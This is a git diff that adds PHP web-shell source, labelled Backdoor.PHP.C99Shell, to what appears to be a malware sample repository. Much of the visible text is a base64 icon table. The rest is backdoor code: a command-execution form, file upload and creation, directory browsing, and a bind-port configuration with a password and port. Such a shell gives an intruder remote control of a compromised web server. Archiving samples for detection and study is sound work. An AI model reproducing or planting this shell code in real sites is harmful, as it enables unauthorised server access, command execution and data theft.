+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
    ");}}}} + natsort($images); + $k = array_keys($images); + echo "
    "; + foreach ($k as $u) {echo $u.":
    ";} + echo "
    "; + } + exit; +} +if ($act == "about") {echo "
    Special Thanks :

    kangkung, milw0rm, AyaX, milw0rm Digital Security Team, etc.
    ";} +?> +
    + +

    :: Command execute ::

    Enter:
     
    Select:
     
    +
    + + + + + +
    :: Search ::
      - regexp 

    :: Upload ::
     
    +
    :: Make Dir ::
     
    :: Make File ::
     
    +
    :: Go Dir ::
     
    :: Go File ::
     
    +

    Powered by kangkung | kangkung | Generation time:

    + + + + + + + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.C99Shell.af b/PHP/Backdoor.PHP.C99Shell.af new file mode 100644 index 00000000..cf989d4c --- /dev/null +++ b/PHP/Backdoor.PHP.C99Shell.af @@ -0,0 +1,2927 @@ +array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"), + "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar") +); +$hexdump_lines = 8; +$hexdump_rows = 24; +$nixpwdperpage = 9999; +$bindport_pass = "ctt"; +$bindport_port = "11457"; +$aliases = array(); 